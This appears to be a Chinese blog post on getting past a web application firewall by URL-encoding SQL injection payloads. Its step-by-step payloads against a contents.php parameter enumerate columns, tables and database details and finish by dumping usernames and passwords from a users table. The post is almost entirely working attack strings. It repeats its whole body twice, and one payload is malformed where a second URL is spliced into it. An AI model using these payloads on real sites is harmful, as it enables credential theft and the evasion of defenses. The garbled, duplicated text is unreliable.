WAF绕过方法之URL编码
2014-11-02 09:52
225 查看
(1)SQL注入点
contents.php?id=3
(2)字段数
contents.php?id=3 order by 4
(3)显示位数4
contents.php?id=3 union select 1,2,3,4
正常
(4)爆出用户名,数据库,版本号
contents.php?id=3 UNION select 1,2,3,contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
出现问题
(5)爆表
contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
尝试绕过不成功
contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
(6)使用URL编码成功绕过(t经过URL编码后为%74)
contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()
contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)
(7)爆字段
contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users
其中
CONCAT_WS(CHAR(32,58,32),user(),database(),version()) 表示爆出用户名,数据库,版本号
CHAR(117, 115, 101, 114, 115) 表示users
0x3a 表示冒号 :
group_concat 用法参考:点这
参考:点这
contents.php?id=3
(2)字段数
contents.php?id=3 order by 4
(3)显示位数4
contents.php?id=3 union select 1,2,3,4
正常
(4)爆出用户名,数据库,版本号
contents.php?id=3 UNION select 1,2,3,contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
出现问题
(5)爆表
contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
尝试绕过不成功
contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
(6)使用URL编码成功绕过(t经过URL编码后为%74)
contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()
contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)
(7)爆字段
contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users
其中
CONCAT_WS(CHAR(32,58,32),user(),database(),version()) 表示爆出用户名,数据库,版本号
CHAR(117, 115, 101, 114, 115) 表示users
0x3a 表示冒号 :
group_concat 用法参考:点这
参考:点这
相关文章推荐
- 浅谈绕过WAF的数种方法
- WAF绕过方法从简单到高级
- 浅谈绕过WAF的数种方法
- 小红伞的WAF一个绕过方法
- 常见绕过WAF的XSS方法
- 绕过WAF继续SQL注入常用方法
- 浅谈绕过 WAF 的数种方法
- 绕过WAF防火墙继续SQL注入常用方法
- WAF绕过方法
- 浅谈绕过WAF的数种方法
- 见招拆招:绕过WAF继续SQL注入常用方法
- 见招拆招:绕过WAF继续SQL注入常用方法
- 见招拆招:绕过WAF继续SQL注入常用方法
- Javascript URL编码方法的比较
- 、绕过登录验证进入后台的方法整理
- 简介绕过DarkSpy的方法
- 绕过 KIS 7 防火墙的一种简单方法
- Javascript URL编码方法的比较
- IE7中文正式版绕过验证的安装方法
- Javascript URL编码方法的比较